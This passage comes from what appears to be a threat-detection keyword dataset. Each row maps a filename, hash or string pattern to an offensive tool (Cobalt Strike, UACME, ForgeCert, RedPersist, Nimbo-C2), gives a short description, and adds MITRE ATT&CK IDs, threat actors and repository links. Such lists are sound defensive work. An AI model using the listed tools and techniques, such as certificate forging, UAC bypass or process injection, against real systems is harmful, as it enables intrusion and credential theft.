T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Starkiller,1,1,N/A,N/A,10,1126,186,2023-08-27T18:33:49Z,2020-03-09T05:48:58Z -*bd346689-8ee6-40b3-858b-4ed94f08d40a*,offensive_tool_keyword,ForgeCert,ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.,T1553.002 - T1136.003 - 
T1059.001,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GhostPack/ForgeCert,1,0,N/A,10,6,538,87,2022-10-07T18:18:09Z,2021-06-09T22:04:18Z -*BD602C80-47ED-4294-B981-0119D2200DB8*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,0,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*BD745A5E-A1E9-4FDD-A15B-E9F303A625AE*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*bd745a5e-a1e9-4fdd-a15b-e9f303a625ae*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*bdamele/icmpsh*,offensive_tool_keyword,icmpsh,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - 
TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/r00t-3xp10it/venom,1,1,N/A,10,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*bdcsync*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bdlcnpceagnkjnjlbbbcepohejbheilk*,greyware_tool_keyword,Malus VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bdllinject*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bdllinject*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider 
- Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bdllload*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bdllload*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bdllspawn*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bdllspawn*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*be93e59137554e3f45e8c6fbc22f0fbe42a1dfa8e457e60894bfda1388d61a1e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*Beacon Payload Generator*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*beacon.*winsrv.dll*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*beacon.CommandBuilder*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*beacon.CommandBuilder*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*beacon.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon.elf*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*beacon.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon.exe*,offensive_tool_keyword,cobaltstrike,default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. 
Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon.nim*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF Files with Nim!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/byt3bl33d3r/BOF-Nim,1,1,N/A,10,10,83,12,2022-07-10T22:12:10Z,2021-01-12T18:58:23Z -*Beacon.Object.File.zip*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*beacon.ps1*beacon.exe*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*beacon.x64*.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and 
Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon.x64*.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 